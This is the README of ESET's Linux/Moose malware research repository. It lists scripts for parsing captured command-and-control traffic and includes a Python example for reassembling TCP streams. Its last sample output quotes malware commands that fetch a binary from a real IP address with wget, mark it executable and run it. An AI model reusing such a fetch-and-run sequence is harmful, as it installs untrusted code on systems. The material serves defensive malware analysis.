Linux/Moose

Copyright © 2015 ESET

Content of this repository

cnc1-fake-server.py

Run a fake configuration server that serves a static file

data/

Example captured data

extract_sample.sh

Extracts Telnet data. Useful to extract a sample of the echo infection method

ida/

IDA Python scripts

lib/

Shared code

parse_cnc1_10073reports.py

Extracts the messages described in the section "Reporting a Peer Found to the Configuration C&C Server"

parse_cnc1_config.py

Extracts C&C configuration messages

parse_cnc1_wordlist.py

Extracts the usernames and passwords provided in the C&C configuration

parse_cnc2_nattraversal.py

Extract relay C&C tunnel data

parse_cnc3_response.py

Extract report C&C responses

parse_cnc_request_bulk.py

Bulk extract config C&C requests (output to terminal)

parse_cnc_request_bulk.sh

Bulk extract config C&C requests (output to files)

parse_cnc_request.py

Extract information sent to C&C by infected bot

pcap-extract-10073-socks4.sh

Extract proxy service socks4 tunnel info

pcap-extract-10073-socks5.sh

Extract proxy service socks5 tunnel info

pcap-extract-traffic.sh

Wraps around tshark to gather interesting traffic patterns from pcaps

targeted-vendors/

List of device vendors that could be affected by Linux/Moose with instructions to test your own hardware.

router-check/

Source code for the tool that tests if your own router is reachable via Telnet and uses a weak or default username and password.

tshark_to_raw.py

Processes output of pcap-extract-traffic.sh and dumps raw binary contained in the traffic into files for further processing

wireshark-profile/

A Wireshark profile that prevents the HTTP dissector from kicking in

Conventions

  • Configuration C&C Server is cnc1

  • Relay C&C Server is cnc2

  • Report C&C Server is cnc3

Extracting information from Pcap captures

Scripts exist to extract relevant information from pcaps.

pcap-extract-traffic.sh

Runs the appropriate tshark command line and outputs the raw hex content to stdout.

tshark_to_raw.py

Reassembles the TCP streams and writes them to disk.

parse_cnc1_config.py

Given a raw TCP stream, extracts the C&C configuration.

Example usage:

----
./pcap-extract-traffic.sh cnc1-response <file.pcap> | ./tshark_to_raw.py
./parse_cnc1_config.py tcpstream-000022859.raw
----
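As an added example (not the repository's own tshark_to_raw.py), the following Python models the middle step of that pipeline: it takes tab-separated tshark field output (tcp.stream, frame.number, tcp.payload in hex, as produced by `tshark -T fields -e tcp.stream -e frame.number -e tcp.payload`), groups the payloads per stream in frame order, and writes one tcpstream-NNNNNNNNN.raw file per stream using the naming seen above. The sample lines are constructed and the field layout is an assumption about how the extraction script is invoked.

```python
import binascii
import os
from collections import defaultdict

# Constructed sample of tshark output: tab-separated tcp.stream, frame.number,
# tcp.payload (hex). Two interleaved streams; frame 13 is a data-less ACK and
# frame 15 uses the colon-separated hex form that older tshark versions print.
SAMPLE_TSHARK_OUTPUT = """\
22859\t10\t474554202f20485454502f312e310d0a
7\t11\t6c6f67696e3a20
22859\t12\t486f73743a20
7\t13\t
22859\t14\t6578616d706c652e6e65740d0a0d0a
7\t15\t75:73:65:72:0d:0a
"""


def parse_tshark_lines(text):
    """Group payload bytes by tcp.stream, ordered by frame number."""
    chunks = defaultdict(list)
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 3:
            continue  # malformed or empty line
        stream_id, frame_no, payload = fields[0], fields[1], fields[2]
        payload = payload.replace(":", "")  # normalise the aa:bb:cc form
        if not payload:
            continue  # pure ACK: nothing to append to the stream
        chunks[int(stream_id)].append((int(frame_no), binascii.unhexlify(payload)))
    return {sid: b"".join(data for _, data in sorted(parts))
            for sid, parts in chunks.items()}


def stream_filename(stream_id):
    return "tcpstream-%09d.raw" % stream_id  # e.g. tcpstream-000022859.raw


def write_streams(streams, outdir):
    """Write one .raw file per stream; returns the paths written, by stream id."""
    os.makedirs(outdir, exist_ok=True)
    written = []
    for stream_id, data in sorted(streams.items()):
        path = os.path.join(outdir, stream_filename(stream_id))
        with open(path, "wb") as fh:
            fh.write(data)
        written.append(path)
    return written


if __name__ == "__main__":
    import sys
    print("\n".join(write_streams(parse_tshark_lines(sys.stdin.read()), ".")))
```

The resulting .raw files are what the parse_cnc* scripts consume; streams that carried no data never produce a file.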

Parsing configuration files

----
$ ./parse_cnc3_response.py data/cnc3-response-got-shell.raw
{'cmd_0': u'cd /var\r\n',
 'cmd_1': u'rm ./elan2\r\n',
 'cmd_2': u'wget http://85.159.237.107/xx/atheros_mips/elan2\r\n',
 'cmd_3': u'chmod +x ./elan2\r\n',
 'cmd_4': u'./elan2\r\n'}
----